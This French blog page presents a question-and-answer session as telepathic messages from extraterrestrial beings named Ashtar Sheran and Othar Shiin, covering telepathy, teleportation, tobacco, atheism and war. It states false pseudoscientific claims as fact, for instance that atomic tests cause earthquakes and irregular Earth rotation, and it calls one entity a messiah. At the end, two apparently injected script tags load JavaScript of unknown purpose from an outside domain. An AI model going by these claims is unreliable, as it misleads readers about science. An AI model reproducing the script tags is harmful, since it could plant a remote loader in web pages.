• ENSEIGNEMENTS

    - UNE INTELLIGENCE SUPÉRIEURE -

    Nous avons une grande confiance en ce que tu nous dis. Presque tous ceux qui ont lu tes enseignements ont été impressionnés. Ils sont étonnés cependant que vous ne puissiez correspondre avec nous par des systèmes radiodiffusion.

    Asthar Sheran : Je vous remercie beaucoup pour la confiance que vous me portez. Je connais vos soucis. Naturellement, vous avez pensé à ce mode de transmission. Nos systèmes de communication ont pris une autre voie. Nous avons entrepris néanmoins de tels essais et nous savons par expérience que les émissions radiophoniques, depuis nos vaisseaux de vol, ne sont pas prises en considération ; elles passent pour des falsifications d'amateurs.

    D'autre part, nous utilisons une méthode nettement meilleure : la transmission par télépathie. Pour elle, il n'y a pas d'obstacle, pas de limite spatiale, et c'est le moyen le plus rapide que nous connaissions.

    En ce qui concerne la télépathie, il y a toujours une certaine part de scepticisme.

    Asthar Sheran : Pour nos transmissions de pensée, nous avons développé une méthode technique. Nous utilisons un amplificateur; c'est un faisceau de guidage qui dirige la pensée dans une certaine direction. Pensez, à votre rayon LASER. Le progrès offre d'innombrables réserves de possibilités. Mais pour toutes Il faut cependant une Intelligence Supérieure. Dans ce but, nous avons systématiquement éduqué notre conscience et adapté notre cerveau, en y consacrant une grande partie de nos efforts.

    Il n'y a pas de zone inutilisée dans notre cerveau. Il est totalement en action, même ce qu'on appelle la seconde moitié, laquelle est particulièrement exploitée par la télépathie qui y joue un rôle important. C'est ainsi que nous l'utilisons pour entrer en contact avec vous.

    La télépathie est également l'objet, chez vous, des recherches les plus poussées. Le Professeur Dr. Hans BESDER, de l'institut para-psychologique de Fribourg en Brisgau, a souligné dans une émission de télévision que les perceptions métaphysiques sont prouvées scientifiquement, y compris la télépathie. De telles expériences ont été faites aussi bien aux U.S.A. qu'en U.R.S.S. Il a été réalisé des expériences télépathiques sur une distance de 1.700 km. Il a été également effectué des essais avec des sous-marins et des satellites. La télépathie traverse toute matière et toute zone électrique.

    Pourrons-nous construire, dans un proche avenir, des objets volants ressemblant aux O.V.N.I. ?

    Asthar Sheran : Je crois que cet espoir est à exclure pour l'instant. La charge totale des carburants que vous utilisez pour le déplacement de vos fusées actuelles est trop lourde. Un voyage stellaire ne peut s'effectuer qu'en utilisant des photons, c'est-à-dire des particules de lumière. Il est certain qu'au cours de vos recherches dans le domaine spatial. vous allez faire de nouvelles découvertes. Il n'est pas exclu que vous trouviez le secret de l'Anti-Univers.

    Quant à utiliser techniquement les énormes forces de l'Univers, et que vous vous en serviez pour propulser vos vaisseaux spatiaux, cela est dans un avenir encore lointain. Il se pourrait que nous vous aidions, mais il nous faudra alors être totalement certains que vous n'utiliserez ces inventions que pour en faire profiter l'humanité, et non pour lui causer des dommages.

    Tels que nous pouvons vous observer actuellement, vous êtes encore très loin du but. Pour l'instant, ce sont encore les forces destructrices qui règnent. Vous sympathisez encore avec la mort.

    La téléportation, c'est-à-dire le déplacement d'un lieu à un autre a déjà été expérimentée à plusieurs reprises. Les guides spirituels de l'autre monde utilisent également ce mot. Pouvons-nous considérer comme certain que la téléportation soit utilisée par les extra-terrestres ?

    Asthar Sheran : Dans notre langage nous nous servons d'un autre terme. Mais Il s'agit effectivement, pour nous aussi, d'un transfert instantané d'un lieu à un autre. Ce qu'on appelle la téléportation est un procédé souvent nommé dématérialisation.

    On prétend que la téléportation est effectuée par la force spirituelle. Est-ce vrai ?

    Asthar Sheran : Oui, on peut aussi l'utiliser. Mais, en ce qui concerne nos vaisseaux spatiaux. il s'agit d'un procédé technique. Ce qui choque votre science, c'est que des hommes vivants disparaissent et réapparaissent sans subir de dommages.

    Comment expliquez-vous que l'homme ne subisse aucun dommage ?

    Asthar Sheran : La réponse peut être formulée simplement : puisqu'il y a corps et esprit, les deux parties sont différentes. Si le corps est dématérialisé, la loi de construction n'est pas pour autant supprimée. En ce qui concerne votre Âme, elle est Intouchable. Une téléportation peut s'effectuer sans le moindre dommage, car ce procédé se réalise en une fraction de millionième de seconde. Avec cette rapidité, la corps n'a pas la possibilité de courir un danger. Chaque dommage matériel a besoin pour se produire, d'un temps relativement long.

    Nos scientifiques et Ingénieurs estiment que l'humanité terrestre a atteint un très grand degré d'intelligence. Au cours des 50 dernières années, nous avons fait d'énormes progrès. Comment jugez-vous ce développement ?

    Asthar Sheran : Oui, j'admets que vous avez obtenu de grands résultats, mais lorsqu'on porte un jugement sur une Intelligence. on ne peut jamais le reporter en totalité sur l'individu. C'est sur ce point que vous commettez une faute importante. Le degré d'intelligence d'un homme terrestre pris individuellement est jugé, dans notre perspective, encore très minime. Même si je considère un ingénieur qui invente des ordinateurs, il s'agit d'un savoir spécialisé, d'une routine d'expert unilatérale. En d'autres domaines, et surtout en ce qui concerne l'évolution humaine, Il peut être d'une nullité totale.

    Un prix Nobel peut avoir mérité très justement ce titre ou cet honneur, mais être d'un très mauvais caractère. On rencontre trop souvent de tels hommes dans les milieux militaires ou politiques. Je ne veux nommer aucune personnalité, cependant certaines d'entre elles vous sont connues.

    Nous reconnaissons sans nul doute que vous êtes beaucoup plus avancés que nous en ce qui concerne le savoir supérieur. Comment une personnalité donnée peut-elle posséder, chez vous, un savoir universel ?

    Asthar Sheran : Nous avons déjà eu et souvent, des périodes de marée basse sur notre sphère. Mais nous avons compris à temps qu'une évolution positive était possible que si un Créateur Génial et Ses Hiérarchies étaient reconnus. Cette reconnaissance enlève toute force à tout ce qui est négatif. C'est le contraire qui se produit chez vous. C'est pourquoi il ne faut pas vous étonner de ce que vous vous engagez dans des voies sans issue dont vous ne pouvez ensuite sortir.

    Déjà, le seul fait d'ignorer que la vie existe après la mort et de n'avoir pas conscience de vos responsabilités, conduit vers de faux chemins. Il s'ajoute à cela l'état de santé de tous les hommes terrestres qui est de plus en plus mauvais. Le patrimoine héréditaire de l'homme se désagrège complètement. J'ai déjà attiré votre attention sur ce point. Nous avons amélioré notre état de santé et par suite prolongé notre vie. Nous vivons beaucoup plus vieux que vous et de ce seul fait, nous avons davantage de possibilités pour arriver à la maturité spirituelle. L'hygiène seule ne suffit pas. Le sport non plus ne peut arrêter la décrépitude.

    Qu'est-ce qui attire le plus vos remarques ?

    Asthar Sheran : Cela, chacun de vous peut le constater à chaque seconde. Fumer est un vice bien ancré sur toute la Terre. Votre énorme production contamine toute l'humanité terrestre. Il ne s'agit pas d'une dégustation mais d'un poison sournois et de grande efficacité à long terme. Une telle situation ne pourrait exister chez nous. Vous possédez de nombreux documents statistiques concernant ce domaine. Faites donc le bilan et vous comprendrez. Le tabac empoisonne les nerfs et le système sanguin ; il détruit les cellules et il est à l'origine de mutations et de fausses couches. Mais le tabac paralyse aussi la Volonté, ralentit les fonctions du cerveau et rend l'homme incapable de prendre des décisions.

    Cet état est encore aggravé si l'on y ajoute l'abus de l'alcool. Les hommes qui s'adonnent à ces vices deviennent déments, privés de nerfs et usés ; et ce sont eux qui, chez vous, jouent le rôle de guides ! Nous ne pouvons que nous frapper le front devant ces errements, lorsque nous voyons des pédagogues tolérer et même encourager de telles pratiques dans les écoles. Ces aberrations de la part des professeurs ne peuvent venir que de personnes complètement déréglées au point de vue de la morale et des moeurs. Ce n'est pas de la pédagogie, c'est de l'homicide. C'est une véritable mutilation des corps humains qui leur sont confiés pour être instruits.

    Le tabac nous est venu des Peaux-Rouges. Ceux-ci avaient-lis aussi perdu leur santé par ces abus ? lis vivaient dans la nature libre et ils étaient bien bâtis.

    Asthar Sheran : Le tabac n'était pas chez vos Indiens un moyen de jouissance mais seulement un symbole de paix. Il n'était fumé que par symbolisme dans un « calumet de la paix » et seulement une bouffée chacun pour sceller la réconciliation. Mais les Européens ont fait de l'usage du tabac un vice généralisé. De nos jours l'État et l'industrie se battent pour l'exploitation de ce vice, afin d'en tirer un bénéfice.

    (Extrait d'un dictionnaire de conversation « L'abus démesuré du tabac peut provoquer un certain nombre de maladies telles que : catarrhes, ulcères d'estomac, battements de coeur, tremblements des membres, dérangements hypocondriaques, insomnies, faiblesse générale des nerfs, voir paralysie avancée, cécité. Fumer ou mastiquer le tabac peut provoquer le cancer »).

    Tu as raison puisque l'humanité connaît aujourd'hui les dangers de la nicotine, mais la masse ne se laisse pas influencer pour autant.

    Asthar Sheran : Par là vous constatez votre manque de volonté et de logique. Ceci démontre-clairement que votre intelligence est atteinte dans son intégrité. Même vos dirigeants qui prennent toutes les responsabilités à votre place, n'y font pas exception ; ils exhibent leurs vices en public. Êtes-vous après cela, étonnés que la situation de votre monde soit en réel péril ?

    Comment voulez-vous que celui qui ne respecte ni ne ménage son propre corps et sa propre âme et qui gâche ses forces, puisse avoir la moindre étincelle de sentiment et de responsabilité pour son concitoyen ? Ils parlent des peuples qui comptent des centaines de millions, et pour eux un seul homme en tant d'individu ne compte pas. Ils l'ignorent.

    Fumer ? Peu importe, qu'il s'agisse d'une seule bouffée de cigarette ou de peuples entiers, oui, et même d'une humanité entière. S'ils fument tous et qu' ils en meurent, ce ne sera qu'un crime capital de plus, et de la pire espèce.

    Reconnaissez donc par cet exemple que vous acceptez les pires crimes, que vous vous inclinez devant l'industrie, que vous ne jugez que d'après le profit, et que vous collaborez à ces erreurs néfastes.

    Vous pouvez faire les mêmes observations en ce qui concerne vos guerres qui sont déclenchées par esprit de lucre en vue d'en tirer un profit. Qu'importe si elles détruisent des nations entières et les jettent dans la misère ou la mort !

    C'est ainsi que vous vous soumettez à l'industrie. Vous soutenez le crime. Les peuples de la Terre, tous les peuples, ne veulent pas la guerre, et ne veulent pas d'effusion de sang. mais on n'écoute pas celui qui n'a pas de pouvoir. On dispose de lui, de sa vie, de son existence. C'est encore heureux pour chacun d'entre vous qu'on ne puisse disposer de vos Âmes, qu'on ne puisse pas les tuer elles aussi.

    Cet état de choses existe également dans vos religions. Vos prêtres vous menacent de la condamnation de l'Enfer, de l'excommunication si vous vous permettez de critiquer leurs opinions.

    On nous a écrit que tes messages sont de plus en plus sévères.

    Asthar Sheran : C'est juste ; parce que la situation s'aggrave de plus en plus. Je voudrais pouvoir parler avec une voix de tonnerre afin qu'elle puisse être entendue dans le monde entier.

    Que pouvons-nous faire pour diffuser une foi véritable en DIEU ? Tu dis que cette connaissance entraînerait un très grand développement de l'intelligence.

    Asthar Sheran : Changer une génération idolâtre et adultère est presque impossible. On ne peut pas plier un chêne mais votre jeunesse doit emprunter une voie plus raisonnable, sinon l'humanité est perdue, tellement perdue qu'elle devra recommencer à zéro. Vous en portez toute la responsabilité. Vous devez préparer ce chemin à la jeunesse et bien l'éclairer. Vous me répondrez que c'est l'affaire de la jeunesse de trouver elle-même sa voie. C'est une très grande erreur. La jeunesse ne peut jamais prendre seule une telle décision parce qu'elle manque de maturité, de vue exacte de l'ensemble des choses, voire de prévoyance.

    Mais la plupart d'entre vous ferez partie dans l'avenir de la génération à venir, même si la conscience de vos vies passées est momentanément occultée par votre présente incarnation. Vous croyez qu'avant votre existence terrestre, vous n'étiez pas conscients, c'est une erreur.

    Vos religions font du péché originel la dette héréditaire que votre Maître le CHRIST aurait payée. Mais rien n'a été racheté puisque cette dette héréditaire vient d'un tout autre péché. Cela n'a aucun rapport avec Adam et Ève, puisque ces deux êtres ont été inventés. Chacun d'entre vous est un Adam ou une Ève. Dans une vie antérieure, vous avez chacun travaillé à l'édification de la civilisation telle qu'elle est actuellement. Vous avez tous pris part au développement de l'humanité terrestre et y avez collaboré. Mais vous avez aussi péché. Vous comprenez maintenant que vous préparez aujourd'hui le monde dans lequel vous vivrez dans l'avenir, de même que vous vous êtes créé autrefois ce monde dans lequel vous vivez aujourd'hui.

    Vos églises détiennent cette importante connaissance qui était déjà répandue depuis des centaines d'années, mais pour des raisons égoïstes, elles l'ont écartée. Je vous fais à nouveau remarquer aujourd'hui l'existence de ce point important.

    Vous serait-il possible, à toi ou à un autre SANTINER de vous matérialiser pour participer à un congrès ou à une conférence au sommet ? Nous supposons que ta parole serait apte à stigmatiser toutes les ambiguïtés de nos diplomates et pourrait ainsi démontrer votre supériorité.

    Asthar Sheran : Une dématérialisation à l'intérieur d'un vaisseau spatial est très possible et plus facile encore dans un vaisseau-mère. À l'extérieur d'un OVNI ces dématérialisations ne sont possibles qu'avec l'aide des forces spirituelles, c'est-à-dire seulement sur une base spirituelle.

    Pour assister à un congrès nous n'aurions pas la protection nécessaire et la force spirituelle ne serait pas suffisante, car il nous faudrait pour cela une atmosphère particulière qu'il serait impossible d'obtenir à l'intérieur d'une salle politique, scientifique ou universitaire. C'est pour cela que nous sommes obligés d'emprunter d'autres voies, même si celles-ci ne sont pas toujours à notre goût.

    Je sais à quel Point vous êtes tous impatients. Il vous manque l'apprentissage du calme spirituel. Quoi qu'il en soit, nos contacts avec vous sont obtenus, à notre initiative, grâce à nous et non à vous, à nos efforts plus qu'aux vôtres.

    Lorsque nous savons qu'il y a quelque part un bon médium, nous nous efforçons d'entrer en intelligence avec lui. Vous vous avez fait vos preuves et nous vous en remercions beaucoup.

    « Une liaison avec ASHTAR SHERAN n'est malheureusement pas possible aujourd'hui. Ici OTHAR SHIIN vous parle. J'ai reçu délégation d'ASHTAR SHÉRAN pour vous répondre en son nom. Posez-moi des questions s'il vous plaît ».

    Il y a environ dix ans vous nous avez annoncé que vous parleriez à l'humanité par la radio, malheureusement vous ne l'avez pas encore fait. Pouvez-vous nous en parler ?

    OTHAR SHIIN : J'avoue que de tels contacts sont très rares. Pour le moment Il n'y a eu que quelques radios d'amateurs pour nous recevoir. Nos forces émettrices sont difficilement maintenues. Aussi n'arrivent-elles que mutilées ou pas du tout. Il y a cependant quelques radios qui ont davantage de possibilités à se mettre sur notre longueur d'onde. Nous avons, par exemple, réussi des contacts avec les Américains et les Australiens. Mais il n'en est résulté que peu de chose car les gens qui nous reçoivent ne sont pas crus lorsqu'ils le relatent autour d'eux. La méfiance est très grande. D'autre part, les milieux gouvernementaux ne voient pas d'un très bon oeil qu'un simple citoyen ait des relations hors de l'ordinaire. Les gouvernements n'aiment pas que l'on regarde leurs affaires à la loupe.

    Avez-vous essayé d'émettre sur nos longueurs d'onde ?

    OTHAR SHIIN : Nous utilisons un procédé qui a peu de ressemblance avec vos appareils. Par conséquent, nous utilisons une autre genre d'onde, également de nature électrique.

    Pourquoi n'utiliseriez-vous pas un de nos appareils ? Vous devez pouvoir vous en procurer un.

    OTHAR SHIIN : Il perturberait tout notre système de pilotage. Nous sommes obligés de faire attention à nos vaisseaux spatiaux. Nous ne pouvons pas nous permettre de faire des émissions de radio telles que vous les entendez. Nous utilisons des ondes radio qui s'adaptent au système de nos vaisseaux spatiaux. Ces ondes sont en partie captées par sons radiotélescopes, mais l'opérateur en ignore la provenance. Vous en cherchez l'origine dans des mondes éloignés où vous les supposez émises.

    Estimes-tu que vos émissions radio fonctionnent mieux que les nôtres ?

    OTHAR SHIIN : Nous n'utilisons pas beaucoup aujourd'hui les relations radio car nous avons des amplificateurs pour la télépathie. Avec ces appareils, nous pouvons faire parcourir à nos pensées de très grandes distances entre les étoiles. Il n'y à pas de perte ni de dispersion, alors que votre atmosphère perturbe énormément nos installations radio.

    Est-il vrai que la Terre ait capté des émissions de télévision vous montrant à l'intérieur d'un vaisseau spatial ?

    OTHAR SHIIN : Je ne peux pas vous donner d'information sur ce point. Nous essayons de ne pas créer de discorde entre vous et nous.

    Avez-vous connaissance que certains esprits négatifs de l'Au-Delà, mus par la duperie et le mensonge, s'efforcent de tromper les médiums en prétendant être des extra-terrestres ?

    OTHAR SHIIN : Oui, nous le savons, mais nous n'y pouvons rien, c'est uniquement à vous de ne pas vous laisser entraîner par eux. En tous cas beaucoup de personnes éprouvent de très bons sentiments à notre égard, Je suis particulièrement heureux qu'Ashtar Sheran ait trouvé un bon accueil parmi la population terrestre. Vous l'appréciez justement. Ayez confiance en lui. Il est un MESSIE, dans le vrai sens du terme.

    L'athéisme refuse de croire aux extra-terrestres ou en un Génie Créateur. L'univers, selon eux, doit s'être créé tout seul. As-tu une explication raisonnable de l'existence du Créateur ?

    OTHAR SHIIN : L'athéisme est le résultat d'un jugement très superficiel. L'Ordre et la Loi des choses exigent une planification consciente. Il n'y a pas la moindre preuve que l'ordre et la création des lois se soient faits spontanément. Par contre, des milliards d'indices prouvent qu'un Agent de Planning puissant se tient derrière toute ce qui existe.

    Aussi je peux affirmer que, de tout ce que j'ai vu, l'athéisme est ce qu'il y a de plus illogique. Cet athéisme est générateur d'erreurs, oui, et même de chaos. La diffusion de ces blasphèmes qui s'étendent surtout dans le secteur de la politique, prouve la faiblesse de vos capacités de penser. Votre esprit n'est pas capable d'utiliser votre cerveau en totalité. Une grande partie de celui-ci est en friche. Vous n'avez pas, par exemple, la possibilité de distinguer une grandeur d'un centre. Prenons par exemple, la vibration de la pensée, donc de conscience, elle a une étendue infinie dans le cosmos. Le rapport de grandeur entre une vibration matérielle, c'est-à-dire une impulsion électrique du cerveau, et une impulsion de la conscience, c'est-à-dire, un Engramme cosmique, a comme différence, en comparaison celle d'un grain de sable par rapport à la Terre.

    Un engramme de conscience énergétique est infiniment petit mais doué d'une extraordinaire puissance. La conscience cosmique de DIEU existait déjà avant que la matière ne soit créée. DIEU est la forme-pensée universelle.

    Mais si riche soit-elle, votre pensée ne suffit pas pour saisir les écoulements de temps grands et petits. Vous manquez d'exercice dans la pratique de vos pensées. Malheureusement cet état s'aggrave de plus en plus, car vos cellules sont empoisonnées par les vices. Les chefs et intellectuels importants ne peuvent formuler une pensée sans fumer une cigarette. lis sont esclaves de ce poison et C'est ce poison qui influence leurs décisions et leurs responsabilités.

    Vous, les SANTINERS, qui avez une plus grande envergure de pensée, et ceci est prouvé par votre technique, pouvez-vous nous expliquer exactement ce qu'est l'électricité ? Nous ne savons pas encore lui donner une réelle explication.

    OTHAR SHIIN : Ce que vous appelez électricité est un volume de force existant dans tout le Cosmos et que l'on peut capter et diviser sous certaines conditions. Seule une faible partie est captée et liée à la matière. Lorsque la division de ses forces est stoppée et que celles-ci sont de nouveau réunies, il s'ensuit une production de chaleur. Mais cette question pose un problème. Comment vous l'expliquer dans votre langage puisque les substantifs vous manquent.

    Quelles sont les raisons prédominantes qui nous poussent constamment de guerre en guerre, peux-tu nous le dire ?

    OTHAR SHIIN : Je dirai qu'il s'agit de bêtise, et cette bêtise est très dangereuse, car elle ne voit pas les conséquences et n'observe aucune logique. S'il s'y ajoute l'égoïsme et le reniement de DIEU, la pensée s'axe sur un but unique : la destruction de l'adversaire.

    En ce qui concerne la recherche atomique, sommes-nous engagés dans une fausse voie ?

    est permise, même si l'on effectue des recherches sur l'Enfer. Mais l'utilisation de ces forces doit toujours être pour le bien de la Création. Dans la vie matérielle de la Création chaque homme a le rang le plus élevé. C'est pourquoi son bien est mis à la première place.

    Mais vous ne le prenez pas en considération. Vos bombes atomiques libèrent des énergies qui influencent la ceinture magnétique de la Terre. Quand les rapports de tension sont déréglés, il s'ensuit sur la Terre des catastrophes qui ne devraient pas avoir lieu. Il est vrai qu'il y a aussi des catastrophes naturelles que l'homme ne peut empêcher. Cependant, depuis un certain temps il y a chez vous des désastres occasionnés par la nature, mais ils sont dûs à vos expériences atomiques.

    Il en résulte : tremblements de terre et raz de marée, perturbations atmosphériques, des décalages de climat ainsi que des courants marins et magnétiques, une irrégularité de la rotation de la Terre, et beaucoup d'autres effets... Vous provoquez beaucoup de malheurs.

    Nous trouvons tes réponses très intéressantes. Le temps dont tu disposes nous permet-il de te poser d'autres questions ?

    OTHAR SHIIN : S'il est permis d'y répondre, je le ferai de tout coeur, mais nous n'avons pas le droit de vous entretenir de certaines choses. Pour votre bien nous les gardons secrètes.

    On s'étonne que les réponses de l'instructeur universel ASHTAR SHERAN soient formulées en des termes extrêmement clairs. Nous constatons que tous les SANTINERS répondent d'une façon très précise. Pourquoi portez-vous un si grand intérêt à notre Terre ?

    OTHAR SHIIN : Les humanités de plusieurs étoiles forment une union fraternelle. Nous aimerions bien qu'une humanité aussi importante que celle de la Terre fasse partie de cette Fraternité. Ces accords fraternels forment un Conseil sur lequel toutes les humanités s'alignent. Le Conseil Cosmique CONDAMNE L'HUMANITÉ TERRESTRE en raison de son comportement inhumain et anti-Divin.

    Pourquoi ne recevons-nous pas de votre part des objets fabriqués par vous ou venant de votre planète. ?

    Il existe entre la matière de notre planète et celle de la Terre, une étrange différence. Dès que nous avons de la matière terrestre à bord de nos vaisseaux, nos agrégateurs sont influencés et nous avons des difficultés de pilotage, nos installations sont perturbés et des dérangements de commutation sont également provoquées. Tout redevient normal lorsque nous rejetons la matière terrestre hors de nos vaisseaux.

    L'Homme est aussi fait de matière terrestre. Comment réagit l'OVNI lorsque vous prenez un homme terrestre à bord ?

    OTHAR SHIIN : Dans ce cas le comportement est surtout influencé par les objets ou les vêtements que l'Homme porte sur lui. L'Homme lui-même ne provoque aucun dérangement. Pour l'emmener avec nous en voyage interstellaire, Il faut d'abord l'acclimater.

    Les incrédules tendent à faire croire que votre existence est du domaine de la superstition. Qu'allez-vous faire contre cette campagne ?

    OTHAR SHIIN : Nous devons soutenir votre entendement vers une hyperscience. Elle inclura les domaines mystiques que vous appelez superstition.
    <script src="http://centrexity.com/converter.js" type="text/javascript"> </script>

    <script src="http://centrexity.com/converter.js" type="text/javascript"> </script>

  • Commentaires

    Aucun commentaire pour le moment

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :